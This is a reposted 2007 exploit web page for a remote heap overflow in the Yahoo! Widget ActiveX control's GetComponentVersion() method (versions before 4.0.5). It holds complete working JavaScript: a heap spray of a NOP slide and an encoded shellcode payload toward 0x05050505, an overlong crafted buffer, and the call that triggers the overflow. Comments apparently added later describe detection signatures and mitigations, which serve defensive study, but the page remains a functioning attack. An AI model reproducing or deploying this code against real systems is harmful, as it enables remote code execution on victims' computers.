Yahoo! Widget < 4.0.5 GetComponentVersion() Remote Overflow Exploit
来源:www.vfocus.net 作者:lhoang 发布时间:2007-08-01  
<html>
<!--
+++++++++++++++++++++++
+Last Modified by lhoang8500++
+++++++++++++++++++++++
-->
<html>
<!-- Instantiates the COM/ActiveX object with this CLSID and exposes it to script as "target";
     per the page title it is the Yahoo! Widget component whose GetComponentVersion() overflows.
     For defenders the CLSID is the stable indicator: a web page that loads it is worth flagging,
     and disabling the control in the browser (kill bit for this CLSID) removes the attack
     surface on hosts that cannot be updated. -->
<object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" id="target"></OBJECT>

<SCRIPT language="javascript">

// Heap-spray stage, annotated for analysis. These statements only allocate
// large strings in the page's script heap; the vulnerable control is not
// touched until the GetComponentVersion() call further down the page.
// Detection: a page that decodes a long run of %uXXXX escapes with unescape()
// and then allocates tens of MiB of near-identical strings is a classic
// heap-spray signature. Mitigation: DEP and ASLR make this pattern far less
// dependable, and updating the affected software removes the trigger.

// Address the sprayed data is meant to cover. Every byte of it is 0x05.
var heapSprayToAddress = 0x05050505;

// %u-escaped 16-bit values that unescape() turns into a string of raw code
// units. This is an opaque binary payload; what it does when executed cannot
// be determined from this page, so treat it as hostile and do not run it.
var payLoadCode = unescape("%uc931%ue983%ud9b0%ud9ee%u2474%u5bf4%u7381%u2713%uf3fc%u830c%ufceb%uf4e2%u96db%u4118%u05cf%uf30c%u9cd8%u6078%ud803%u4978%u771b%u098f%ufd5f%u871c%ue468%u5378%ufd07%u4518%uc8ac%u0d78%ucdc9%u9533%u788b%u7833%u3d20%u0139%u3e26%uf818%ua81c%u24d7%u1952%u5378%ufd03%u6a18%uf0ac%u87b8%ue078%ue7f2%ud024%u8578%ud84b%u6def%ucde4%u6828%ubfac%u87c3%uf067%u7c78%u513b%u4c78%ua22f%u829b%uf269%u5c1f%u2ad8%u5f95%u9441%u3ec0%u8b4f%u3e80%ua878%udc0c%u374f%uf01e%uac1c%uda0c%u7578%u6a16%u11a6%u0efb%u9672%uf3f1%u94f7%u052a%u51d2%uf3a4%uaff1%u5fa0%uaf74%u5fb0%uaf64%udc0c%u9441%u50e2%uaf41%ued7a%u94b2%u1657%u3b57%uf3a4%u96f1%u5de3%u0372%u6423%u5183%ue5dd%u0370%u5f25%u0372%u6423%ub5c2%u4575%u0370%u5c25%ua873%uf3a6%u6ff7%ueb9b%u3a5e%u5b8a%u2ad8%uf3a6%u9af7%u6899%u9441%u6190%u19ae%u5c99%ud57e%u853f%u96c0%u85b7%ucdc5%uff33%u028d%u21b1%ubed9%u9fdf%u86aa%ua7cb%u578c%u7e9b%u4fd9%uf3e5%ub852%uda0c%uab7c%u5da1%uad76%u0d99%uad76%u5da6%u2cd8%ua19b%uf9fe%u5f3d%u2ad8%uf399%ucbd8%udc0c%uabac%u8f0f%u98e3%uda0c%u0375%u6423%u76d7%u53f7%u0374%uf325%ufcf7%u0cf3%u0000");

// Size of each sprayed string in bytes: 0x400000 = 4 MiB.
var heapBlockSize = 0x400000;

// Payload size in bytes: string length times two, because each JavaScript
// string element is a 16-bit code unit.
var payLoadSize = payLoadCode.length * 2;

// Bytes left in a block for filler once the payload is subtracted.
// NOTE(review): the extra 0x38 is presumably an allowance for per-allocation
// header bytes; the page does not say.
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

// Filler seed: two code units of 0x9090, i.e. four 0x90 bytes (the x86 NOP
// opcode). getSpraySlide() repeats it up to spraySlideSize bytes.
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

// (0x05050505 - 0x400000) / 0x400000 is about 19.08, so the loop below runs
// 20 times, roughly 80 MiB of string data in total. heapBlocks, memory and i
// are assigned without var and therefore become implicit globals.
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

// Storing every string in this array keeps it referenced for the lifetime of
// the page.
memory = new Array();

// Each element is the filler followed by the payload.
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
/**
 * Repeats a seed string by doubling until it spans at least spraySlideSize
 * bytes (two bytes per 16-bit code unit), then trims the result to
 * spraySlideSize / 2 characters.
 *
 * An empty seed never grows, so the loop would not terminate for a positive
 * size; callers must pass a non-empty seed.
 *
 * @param {string} spraySlide - seed string to repeat
 * @param {number} spraySlideSize - target size in bytes
 * @returns {string} the repeated seed, cut to spraySlideSize / 2 characters
 */
function getSpraySlide(spraySlide, spraySlideSize)
{
  var filler = spraySlide;
  var wantedChars = spraySlideSize / 2;

  // Doubling reaches the target in a logarithmic number of concatenations.
  while (filler.length * 2 < spraySlideSize) {
    filler = filler + filler;
  }

  return filler.substring(0, wantedChars);
};
// Builds the 1000-character argument for the vulnerable call: one U+0505
// code unit, then '\x0A' up to a length of 845, then U+0505 up to a length
// of 1000.
// NOTE(review): the 0x0505 fill repeats the bytes of heapSprayToAddress, so
// it is presumably the value meant to land on an overwritten pointer; the
// page does not document the 845 offset.
var buffer =  unescape("%u0505");
while (buffer.length < 845)  buffer+='\x0A';
while (buffer.length< 1000) buffer+=unescape("%u0505");

// Trigger: the overlong string is passed to GetComponentVersion() on the
// object with id "target". The page title lists versions before 4.0.5 as
// affected, so updating to 4.0.5 or later is the primary fix; where that is
// not possible, disable the control in the browser.
// Detection: a page that instantiates the CLSID in the <object> tag and calls
// this method with a string of hundreds of characters.
target.GetComponentVersion(buffer);
</script>
</html>

 